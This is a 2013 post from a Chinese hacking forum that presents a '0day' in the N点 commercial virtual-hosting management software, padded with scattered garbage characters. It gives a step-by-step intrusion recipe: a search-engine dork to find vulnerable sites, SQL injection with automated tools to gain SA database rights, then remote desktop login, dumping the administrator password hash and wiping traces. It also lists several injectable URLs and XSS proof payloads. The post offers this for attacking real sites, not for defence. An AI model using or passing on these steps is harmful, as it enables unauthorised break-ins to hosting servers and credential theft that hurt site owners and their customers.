找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2297|回复: 0
打印 上一主题 下一主题

N点商业版漏洞通杀0day以及利用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-3 08:06:44 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
不得不说N点实在是一个破东西
" S# ]+ E5 C9 ]# a  g就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂
: A, I4 I0 g1 j& F( q$ w" P好吧 抱怨一下就行了  接下来关键的时候到了
  E* J0 a; ~- W0 Q* W; {首先百度搜索关键字:inurl: (mmdatabase.asp)
. p2 ]0 O- u; y' y5 `我随便列举一个:   www.xxxx.com( ^& w/ {5 g9 y% ?5 P
修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=1
3 H$ X4 o) o6 T/ I# ?扔入NBSI 或者啊D等各种傻逼工具后
: h9 {# T  W! M) i) G$ w你们会看到是SA权限: e4 h8 u- v& }! j$ E1 [
果断3389 上去  hash得到administrator密码' n/ v/ Z3 B4 |6 l  H2 M
擦屁股走人~5 A5 a8 h5 R+ V: d, k
经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的. ?: U9 k$ U! @- o1 Y+ S

% b2 [; T; z7 S/ w再附上其他几个漏洞页面$ T) M) @7 d0 A5 ~6 F
SQL:( e" [: X9 R+ y5 A% F
http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1
+ p: Y1 h# `* ]6 Thttp://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11( }" K5 N+ E% a! s
http://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9
# M3 E- d1 e- R4 @9 E9 ?http://www.xxxxxx.com:80/Style/vhosting.asp?classID=2
9 f: Y" S4 Q4 BXSS证明:
  [' w& ?- n9 ^! w" ~- qhttp://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
& q7 H8 G$ {: Dhttp://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
' M" ~8 A' C' S" J* i! }+ r, n  e) mhttp://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script>
1 L( ]0 ?, g# ?4 M. K5 R9 C7 H由此可见点就是坑逼中的战斗机   自从用了他我的眼泪都流干了  有做IDC的朋友千万别步我后尘啊   便宜没好货好货不便宜. |- C" O9 `  E4 k1 z; d
还是星外吧  你们懂的
1 e( l/ }# v1 M: x4 v4 F3 y9 E作为一个商用程序   安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?+ M9 x. Y3 g) V# `5 `3 H# ~8 D
PS:其实我真的很想知道你说N点这SB asp就asp吧  为什么asp还非要MSSQL  这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。   o(︶︿︶)o 唉
) W1 f: z$ w0 ~: v8 w" E——-
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表